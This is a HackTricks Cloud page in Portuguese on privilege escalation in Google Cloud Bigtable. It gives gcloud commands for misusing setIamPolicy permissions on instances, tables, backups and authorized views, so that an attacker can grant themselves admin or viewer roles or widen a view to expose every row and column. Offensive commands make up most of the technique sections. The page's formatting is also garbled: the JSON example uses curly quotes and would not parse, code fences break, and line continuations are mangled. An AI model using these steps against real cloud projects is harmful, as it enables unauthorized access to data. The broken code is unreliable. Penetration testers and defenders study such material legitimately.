GCP - Bigtable Privesc

Tip

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprenda e pratique Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Confira os planos de assinatura!

Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-nos no Twitter 🐦 @hacktricks_live.

Compartilhe truques de hacking enviando PRs para o HackTricks e HackTricks Cloud repositórios do github.

Bigtable

Para mais informações sobre Bigtable, consulte:

GCP - Bigtable Enum

`bigtable.instances.setIamPolicy`

Permissões: bigtable.instances.setIamPolicy (e normalmente bigtable.instances.getIamPolicy para ler os vínculos atuais).

Ser proprietário da política IAM da instância permite que você se conceda roles/bigtable.admin (ou qualquer função personalizada), que se propaga para cada cluster, tabela, backup e visualização autorizada na instância.

Conceda a si mesmo a função bigtable.admin na instância

```bash gcloud bigtable instances add-iam-policy-binding \ --member='user:' \ --role='roles/bigtable.admin' ```

Tip

Se não conseguir listar os bindings existentes, crie um novo documento de política e envie-o com gcloud bigtable instances set-iam-policy, desde que você mantenha sua própria entrada nele.

Depois de obter essa permissão, consulte a seção Bigtable Post Exploitation section para mais formas de abusar das permissões do Bigtable.

`bigtable.tables.setIamPolicy`

Permissões: bigtable.tables.setIamPolicy (opcionalmente bigtable.tables.getIamPolicy).

As políticas de instância podem estar bloqueadas enquanto tabelas individuais são delegadas. Se você puder editar o IAM da tabela, pode se promover a proprietário do conjunto de dados alvo sem afetar outras cargas de trabalho.

Grant yourself bigtable.admin role on table

```bash gcloud bigtable tables add-iam-policy-binding \ --instance= \ --member='user:' \ --role='roles/bigtable.admin' ```

Depois de obter essa permissão, verifique na Bigtable Post Exploitation section as técnicas para mais maneiras de abusar das permissões do Bigtable.

`bigtable.backups.setIamPolicy`

Permissões: bigtable.backups.setIamPolicy

Backups podem ser restaurados para qualquer instância em qualquer projeto que você controle. Primeiro, conceda à sua identidade acesso ao backup e, em seguida, restaure-o em um sandbox onde você possua funções Admin/Owner.

Se você tem a permissão bigtable.backups.setIamPolicy, você pode conceder a si mesmo a permissão bigtable.backups.restore para restaurar backups antigos e tentar acessar informações sensíveis.

Take ownership of backup snapshot

```bash # Take ownership of the snapshot gcloud bigtable backups add-iam-policy-binding \ --instance= --cluster= \ --member='user:' \ --role='roles/bigtable.admin' ```

Depois de verificar essa permissão na Bigtable Post Exploitation section para ver como restaurar um backup.

Atualizar authorized view

Permissões: bigtable.authorizedViews.update

Authorized Views destinam-se a mascarar linhas/colunas. Modificá-las ou excluí-las removem as restrições granulares nas quais os defensores confiam.

Atualizar authorized view para ampliar o acesso

```bash # Broaden the subset by uploading a permissive definition gcloud bigtable authorized-views update \ --instance= --table= \ --definition-file=/tmp/permissive-view.json --ignore-warnings

Json example not filtering any row or column

cat <<‘EOF’ > /tmp/permissive-view.json { “subsetView”: { “rowPrefixes”: [“”], “familySubsets”: { “”: { “qualifierPrefixes”: [“”] } } } } EOF

Describe the authorized view to get a family name

gcloud bigtable authorized-views describe
–instance= –table=

</details>

Depois de obter essa permissão, consulte a [**Bigtable Post Exploitation section**](../gcp-post-exploitation/gcp-bigtable-post-exploitation.md) para ver como ler de um Authorized View.

### `bigtable.authorizedViews.setIamPolicy`

**Permissões:**  `bigtable.authorizedViews.setIamPolicy`.

Um atacante com essa permissão pode conceder a si mesmo acesso a um Authorized View, que pode conter dados sensíveis aos quais normalmente não teria acesso.

<details><summary>Conceda a si mesmo acesso a um Authorized View</summary>
```bash
# Give more permissions over an existing view
gcloud bigtable authorized-views add-iam-policy-binding <view-id> \
--instance=<instance-id> --table=<table-id> \
--member='user:<attacker@example.com>' \
--role='roles/bigtable.viewer'

Depois de ter essa verificação de permissão na Bigtable Post Exploitation section para verificar como ler a partir de uma visualização autorizada.

Tip

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprenda e pratique Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Confira os planos de assinatura!

Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-nos no Twitter 🐦 @hacktricks_live.

Compartilhe truques de hacking enviando PRs para o HackTricks e HackTricks Cloud repositórios do github.